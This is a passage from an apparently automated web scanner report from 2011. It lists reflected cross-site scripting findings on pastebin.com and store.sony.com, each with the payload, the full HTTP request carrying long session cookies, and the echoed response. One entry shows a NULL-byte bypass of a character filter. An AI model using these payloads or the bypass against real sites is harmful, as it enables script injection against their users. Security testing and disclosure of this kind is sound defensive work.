Path:   /js/ZeroClipboard.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dac32"><script>alert(1)</script>a0c8a47198e was submitted in the REST URL parameter 2. This input was echoed as dac32\"><script>alert(1)</script>a0c8a47198e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/ZeroClipboard.swfdac32"><script>alert(1)</script>a0c8a47198e HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:50 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=9; expires=Tue, 04-Oct-2011 18:10:50 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/js/ZeroClipboard.swfdac32\"><script>alert(1)</script>a0c8a47198e"/>
...[SNIP]...

1.25. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntk parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The value of the Ntk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a90df"><a>002cb1260d was submitted in the Ntk parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd&langId=-1&Ntk=Producta90df"><a>002cb1260d&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CompareGrid=; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 87955
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 87955
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:20 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<a href="SearchCatalog?Ntt=dvd+cd&Ntk=Producta90df"><a>002cb1260d&langId=-1&storeId=10151&Ntx=mode matchallpartial&y=0&N=0&catalogId=10551&x=0" id="" class="breadBoxRemoveLink" rel="">
...[SNIP]...

1.26. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The value of the Ntt request parameter is copied into a JavaScript rest-of-line comment. The payload 22e7a%0af613d80aa8c was submitted in the Ntt parameter. This input was echoed as 22e7a
f613d80aa8c
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CompareGrid=; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 91021
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 91021
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:19 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
name to call feedback URL
setpageName(s.pageName);
// Server (Not sure what this does)
s.server=''
// Site Section
s.channel=''
// Error Page Flag
// Online Search Terms
s.prop1= searchTerm; //'dvd cd22e7a
f613d80aa8c
'
// # Of Search Results
s.prop2='0'
// Page Template Type
s.prop3='SearchCatalog'
// Department
s.prop4=''
// Category
s.prop5=''
// E-Spot Impressions
s.prop6=s.pageName+'_'+epotpageImpression;
//s.p
...[SNIP]...

1.27. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The value of the Ntt request parameter is copied into the HTML document as plain text between tags. The payload 17748<a%20b%3dc>df6b2e2de39 was submitted in the Ntt parameter. This input was echoed as 17748<a b=c>df6b2e2de39 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd17748<a%20b%3dc>df6b2e2de39&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CompareGrid=; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 91102
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 91102
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:12 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd cd17748&lt;a b=c&gt;df6b2e2de39');return false;">
Search "dvd cd17748<a b=c>df6b2e2de39" on <span class="searchTerm">
...[SNIP]...

1.28. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00119e4"><script>alert(1)</script>575ce0e01d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 119e4"><script>alert(1)</script>575ce0e01d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0&%00119e4"><script>alert(1)</script>575ce0e01d1=1 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 115393
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 115393
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:59:06 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<a href="SearchCatalog?langId=-1&.119e4"><script>alert(1)</script>575ce0e01d1=1&storeId=10151&y=0&catalogId=10551&Nty=1&x=0" id="" class="breadBoxRemoveLink" rel="">
...[SNIP]...

1.29. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [x parameter]  previous  next

Summary

Severity:   High
